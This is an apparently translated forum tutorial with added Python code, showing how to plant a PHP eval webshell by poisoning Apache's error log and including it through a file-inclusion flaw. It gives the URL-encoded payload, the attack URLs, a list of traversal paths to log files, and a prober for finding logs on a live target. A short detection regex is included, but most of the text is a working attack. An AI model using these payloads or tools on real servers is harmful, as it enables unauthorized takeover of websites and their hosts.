Writing a webshell by including Apache logs from PHP

Posted 2012-9-15 14:27:40 by the original poster
Because the method above is not very practical: in my testing I found the log is routinely tens of megabytes, so playing with it that way is no fun. Below I take it one step further and write an actual, usable webshell, which is much better than the painfully slow method above.
Take the same one-line PHP webshell as before:

<?eval($_POST[cmd]);?>
By now you have probably thought of it: this is quite a good approach. Reading on, how to write the file becomes the question. Use fopen to open the file /home/virtual/www.xxx.com/forum/config.php, then write the one-line server-side statement <?eval($_POST[cmd]);?> into it. Put together as a PHP statement, it is:
<?$fp=fopen('/home/virtual/www.xxx.com/forum/config.php','w+');fputs($fp,'<?eval($_POST[cmd]);?>');
fclose($fp);?>   // writes the one-line webshell into config.php

(The strings are single-quoted here. The original used double quotes, but inside a double-quoted PHP string "$_POST[cmd]" is interpolated, so config.php would receive the empty value of $_POST['cmd'] instead of the literal one-liner. Apache 2.x also backslash-escapes double quotes when it writes error_log entries, which would break the PHP syntax once the log is included; single quotes pass through untouched. The short <? tag additionally requires short_open_tag=On on the target.)
We submit this and have Apache record it in the error log, then include the log and the shell gets written. Remember: it must be URL-encoded or it will not work. Encoded, it becomes:

%3C%3F%24fp%3Dfopen%28%27%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%27%2C%27w%2B%27%29%3Bfputs%28%24fp%2C%27%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%27%29%3Bfclose%28%24fp%29%3B%3F%3E
We submit:

http://xxx.com/%3C%3F%24fp%3Dfopen%28%27%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%27%2C%27w%2B%27%29%3Bfputs%28%24fp%2C%27%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%27%29%3Bfclose%28%24fp%29%3B%3F%3E

Now the error log contains the line of code that writes the webshell (Apache logs the decoded request path, which is why the URL encoding above is needed).

Next we include the log; submit:

http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

With that the webshell is written: config.php now holds the one-line webshell.

OK.

http://www.xxx.com/forum/config.php is now our webshell. Connect to it with lanker's one-liner client and the host is yours.
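The whole chain above (build the file-writing payload, URL-encode it, get it into error_log, include the log) as an added Python example. This is not code from the original post: the docroot, client address, timestamp and the exact error_log line format are constructed assumptions, and the escaping function models Apache 2.x's error-log escaping of double quotes, backslashes and non-printable bytes. The example also shows why the single-quoted payload survives the log while a double-quoted one does not, and ends with the check a defender would run over error_log lines.

```python
"""Added example, not code from the original post: build the log-poisoning
payload from the post, URL-encode it the way the post does, model the error_log
entry Apache writes for the 404, and run a detection check over log lines.
The docroot, client address, timestamp and log-line format are constructed
assumptions; the escaping rule models Apache 2.x error-log escaping."""
import re
from typing import List
from urllib.parse import unquote

TARGET = "/home/virtual/www.xxx.com/forum/config.php"  # target path from the post
SHELL = "<?eval($_POST[cmd]);?>"                        # one-liner from the post


def build_payload(target: str = TARGET, shell: str = SHELL, quote: str = "'") -> str:
    """PHP that opens `target` and writes `shell` into it.

    quote="'" is the safe choice: in a double-quoted PHP string "$_POST[cmd]"
    is interpolated, and Apache escapes the double quote in error_log entries.
    """
    if quote in target or quote in shell:
        raise ValueError("quote character appears inside the payload text")
    q = quote
    return (f"<?$fp=fopen({q}{target}{q},{q}w+{q});"
            f"fputs($fp,{q}{shell}{q});fclose($fp);?>")


def url_encode_all(s: str) -> str:
    """Percent-encode every byte except ASCII letters and digits (the post's style)."""
    out = []
    for b in s.encode("utf-8"):
        ch = chr(b)
        out.append(ch if b < 128 and ch.isalnum() else "%%%02X" % b)
    return "".join(out)


def build_request_url(host: str, payload: str) -> str:
    """The GET the post sends: the encoded payload is the request path itself."""
    return f"http://{host}/{url_encode_all(payload)}"


def apache_escape_logitem(s: str) -> str:
    """Assumed model of Apache 2.x error-log escaping: a backslash before the
    double quote and the backslash, C escapes for whitespace controls, \\xNN
    for any other non-printable byte."""
    out = []
    for ch in s:
        if ch in '"\\':
            out.append("\\" + ch)
        elif ch in "\n\r\t":
            out.append({"\n": "\\n", "\r": "\\r", "\t": "\\t"}[ch])
        elif not 32 <= ord(ch) < 127:
            out.append("".join("\\x%02x" % b for b in ch.encode("utf-8")))
        else:
            out.append(ch)
    return "".join(out)


def simulate_error_log_entry(request_path: str, docroot: str = "/var/www/html",
                             client: str = "203.0.113.5") -> str:
    """Constructed 'File does not exist' entry: Apache logs the *decoded* path."""
    decoded = apache_escape_logitem(unquote(request_path))
    return (f"[Sat Sep 15 14:27:40 2012] [error] [client {client}] "
            f"File does not exist: {docroot}{decoded}")


# Detection: a PHP open tag followed by a dangerous call on the same log line.
POISON_RE = re.compile(
    r"<\?(?:php)?.*?\b(eval|fopen|fputs|fwrite|system|passthru|assert)\s*\(",
    re.S | re.I)


def find_poisoned_lines(log_text: str) -> List[str]:
    """Return the error_log lines that carry an injected PHP block."""
    return [ln for ln in log_text.splitlines() if POISON_RE.search(ln)]


# Constructed sample: one benign 404 and the poisoned request from the post.
SAMPLE_ERROR_LOG = "\n".join([
    "[Sat Sep 15 14:27:40 2012] [error] [client 203.0.113.5] "
    "File does not exist: /var/www/html/favicon.ico",
    simulate_error_log_entry("/" + url_encode_all(build_payload())),
])

if __name__ == "__main__":
    print(build_request_url("xxx.com", build_payload()))
    for line in find_poisoned_lines(SAMPLE_ERROR_LOG):
        print("poisoned:", line)
```

Calling build_payload(quote='"') reproduces the original double-quoted version; running it through simulate_error_log_entry shows the quotes come back as \" in the modelled log line, which is the reason for the single quotes in the corrected payload. The same POISON_RE is what you would point at a real error_log when hunting for this technique.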

PS: The prerequisite for all of the above is that the target directory is writable; the post requires it to be -rwxrwxrwx (777) before continuing (what actually matters is that the user Apache/PHP runs as can create or overwrite config.php). Check this directly against the directories listed above. Everything above also assumes the log path is already known.

Other log paths you can guess, or refer to this list (traversal-relative forms first, then absolute):

../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/access_log
../../../../../../../../../../etc/httpd/logs/access.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/error_log
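Guessing the log path from the list above is a loop, not a lookup, so here is an added Python example (not code from the original post) that walks the candidates through the z.php?zizzy= parameter and keeps only the responses that actually look like an Apache access or error log. The HTTP fetch is injected as a function; in this file it is a fake that emulates an unvalidated include() against a small constructed in-memory filesystem, so everything runs offline. The script directory /var/www/html/forum, the log contents and the log fingerprints are assumptions. It generalises the list slightly by generating the ../ depth variants from the absolute paths rather than listing them.

```python
"""Added example, not part of the original post: probe candidate Apache log
paths through an LFI parameter and report which responses look like a log.
z.php, the zizzy parameter and the candidate paths are from the post; the
fetch function is injected, so here it is a fake that emulates a vulnerable
include() against a constructed in-memory filesystem (offline, no network)."""
import posixpath
import re
from typing import Callable, Dict, Iterable, List, Optional
from urllib.parse import parse_qs, urlparse

# A subset of the candidate list above (assumed layout of the target).
BASE_PATHS = [
    "/var/log/httpd/access_log",
    "/var/log/httpd/error_log",
    "/etc/httpd/logs/error_log",
    "/usr/local/apache/logs/error_log",
    "/var/log/apache/error.log",
]

# Fingerprints of genuine Apache output (constructed heuristics, not a spec).
ACCESS_RE = re.compile(r'"(GET|POST|HEAD) \S+ HTTP/1\.[01]" \d{3} ')
ERROR_RE = re.compile(r"\[\w{3} \w{3} \d{2} [\d:]{8} \d{4}\] \[(error|notice|warn)\]")


def looks_like_apache_log(body: str) -> Optional[str]:
    """Classify an included file's content as error_log, access_log or None."""
    if ERROR_RE.search(body):
        return "error_log"
    if ACCESS_RE.search(body):
        return "access_log"
    return None


def candidates(base_paths: Iterable[str], max_depth: int = 10) -> List[str]:
    """Each absolute path, then ../ x n variants for when include() resolves
    relative paths against the script directory (the list above goes to 10)."""
    out = []
    for p in base_paths:
        out.append(p)
        out.extend("../" * n + p.lstrip("/") for n in range(1, max_depth + 1))
    return out


def probe(fetch: Callable[[str], str], base_url: str,
          paths: Iterable[str]) -> Dict[str, str]:
    """Request base_url + path for every candidate; keep those that came back as a log."""
    found: Dict[str, str] = {}
    for path in paths:
        kind = looks_like_apache_log(fetch(base_url + path))
        if kind:
            found[path] = kind
    return found


# ---- fake target, constructed so the probe runs offline ----
FAKE_CWD = "/var/www/html/forum"  # assumed directory of z.php
FAKE_FS = {
    "/var/log/httpd/error_log":
        "[Sat Sep 15 14:27:40 2012] [error] [client 203.0.113.5] "
        "File does not exist: /var/www/html/favicon.ico\n",
    "/var/log/httpd/access_log":
        '203.0.113.5 - - [15/Sep/2012:14:27:40 +0800] "GET /index.php HTTP/1.1" 200 512\n',
}


def fake_fetch(url: str) -> str:
    """Emulates z.php doing include($_GET['zizzy']) with no validation."""
    wanted = parse_qs(urlparse(url).query).get("zizzy", [""])[0]
    full = wanted if wanted.startswith("/") else posixpath.join(FAKE_CWD, wanted)
    resolved = posixpath.normpath(full)
    return FAKE_FS.get(resolved, f"Warning: include({wanted}): failed to open stream")


def run_probe() -> Dict[str, str]:
    """Wire the fake target to the prober; swap fake_fetch for a real HTTP GET to use it."""
    return probe(fake_fetch, "http://xxx.com/z.php?zizzy=", candidates(BASE_PATHS))


if __name__ == "__main__":
    for path, kind in run_probe().items():
        print(f"{kind:10s} {path}")
```

Against a live target, replace fake_fetch with a function that performs the GET and returns the body. Note that if the application appends a suffix to the included name (for example .php), none of these candidates will open as-is; that case needs a different trick and is not modelled here.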